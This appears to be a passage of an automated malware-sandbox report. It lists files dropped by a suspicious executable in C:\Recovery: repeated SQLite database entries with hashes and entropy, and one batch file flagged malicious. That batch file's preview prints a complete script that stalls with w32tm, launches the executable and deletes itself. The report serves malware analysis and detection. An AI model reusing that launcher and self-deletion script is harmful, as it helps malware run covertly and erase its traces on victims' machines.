                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):0.08235737944063153
                                                                                Encrypted:false
                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):213
                                                                                Entropy (8bit):5.2993624981310985
                                                                                Encrypted:false
                                                                                SSDEEP:6:hCijTg3Nou1SV+DE718RkASKOZG1wkn23fVahkh:HTg9uYDE72vIf9D
                                                                                MD5:9A33FED9F6810C619427FB761D4529FE
                                                                                SHA1:591636B03F2A6A38AEF00221BABED2226E9B77AC
                                                                                SHA-256:728825B20499D503FE0D1FF61EDF47F999AC7FB37A622425FD4E7D8453E5075F
                                                                                SHA-512:A1BAC1B871AC12393E14BE0C6F7EDFEEB63318E5409DAFD9DAA04BFF5D37BD55D47E005C96CF80B4B67E1788C4C774696F1967636E6CC7ED0DF69899BA6082C7
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\M1cWFCMEcy.bat"
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
